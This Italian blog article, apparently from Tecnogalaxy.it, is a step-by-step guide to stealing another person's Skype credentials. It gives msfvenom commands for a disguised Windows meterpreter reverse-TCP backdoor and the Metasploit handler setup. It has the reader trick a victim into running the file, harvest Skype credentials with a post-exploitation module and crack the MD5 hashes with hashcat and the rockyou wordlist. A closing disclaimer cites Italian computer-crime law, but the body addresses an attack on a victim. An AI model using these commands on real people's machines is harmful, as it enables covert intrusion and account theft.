Ciao a tutti. In questo articolo vi spiegherò come riuscire a scoprire le credenziali Skype di un’altra persona; chissà quante volte avrete provato ad ottenere le credenziali di accesso al famoso sito di video-messaggistica, ma altrettante volte i programmi che si trovano in rete e che dicono di essere affidabili si rivelano una grandissima presa in giro; oltre a non aver concluso nulla, vi avranno lasciato in eredità qualche bel virus. In questo articolo non staremo di certo a proporvi di scaricare queste specie di programmi, bensì riusciremo nel nostro intento grazie a una backdoor creata con Kali Linux che andrà ad infettare il computer della vittima e ci permetterà di avere ampi controlli sulla macchina remota. Iniziamo!

Come primo passo apriamo il terminale di Kali Linux e digitiamo con ordine i seguenti comandi:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(immettere indirizzo ip locale) LPORT=(immettere porta locale) R > “nome della backdoor.exe”

 

 

 

 

 

 

Dopo questo comando si andrà a creare la backdoor nella cartella “home”

 

 

 

 

 

 

Il vostro IP potete ricavarlo sempre con il comando “ifconfig”;

 

 

 

 

 

 

la porta che vi consiglio di andare ad utilizzare è la 443, ma se volete utilizzarne un’altra nessun problema, potete sempre visualizzare altre porte aperte con il comando nmap, il tutto su un altro terminale. Il nome della backdoor potete sceglierlo voi, così come l’estensione; premetto che il tutto dovrà essere il più camuffabile possibile! Di certo non andremo a denominare il file “backdoorskype” nel corso di un vero attacco!!

Ora procediamo con il comando “msfconsole”, che richiamerà appunto la console di Metasploit Framework.

 

 

 

 

 

 

Poi in successione digitiamo le seguenti righe di comando:

use exploit/multi/handler

 

 

 

 

 

 

set payload windows/meterpreter/reverse_tcp

 

 

 

 

 

 

set LHOST (immettere indirizzo IP già scelto in precedenza)

 

 

 

 

 

 

set LPORT (immettere la stessa porta scelta prima)

 

 

 

 

 

 

Ora non vi resta che inventare un modo per trasferire il file backdoor sul PC della vittima; ovviamente non basterà trasferirlo, ma esso dovrà anche essere aperto. Lascio spazio alla vostra fantasia.

Una volta che la backdoor è stata trasferita sul PC della vittima e quindi aperta, non vi resta che digitare il comando exploit e aspettare che si stabilisca una connessione tra il vostro computer e la macchina in esecuzione remota.

 

 

 

 

 

 

Adesso viene il momento cruciale dell’attacco; abbiamo piantato la nostra backdoor sul PC sotto attacco, ma il nostro obiettivo è quello di scoprire le credenziali skype. Quindi sullo stesso terminale connesso con il dispositivo vittima digitiamo il comando “use post/windows/gather/credentials/skype”, poi ridigiteremo nuovamente exploit. Se il tutto andrà bene, otteniamo le credenziali di accesso; ma non finisce qui. Infatti il tutto è criptato in MD5, ma sarà un gioco da ragazzi decriptare il tutto; vi mostro come.

 

 

 

 

 

 

Aprite un nuovo terminale e digitate il comando “hashcat -m 0 -a 0 “directory del file.txt con gli hash da convertire” “directory della wordlist”

 

 

 

 

 

 

Dovrete sostanzialmente creare un file di testo con dentro le MD5 e salvare il tutto; quindi inserirete nel terminale la directory di questo file. Poi sarà la volta di inserire la directory della nostra wordlist; io vi consiglio la rockyou, un dizionario abbastanza amplio già presente su Kali Linux; non dovrete scaricare nulla, basterà solo cercare il file nel percorso “computer”. Il decript dovrebbe terminare entro pochi istanti, potrebbe richiedere un pò più di tempo nel caso di password lunghe e articolate.

Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).

 

Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!

Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.

Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.

© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.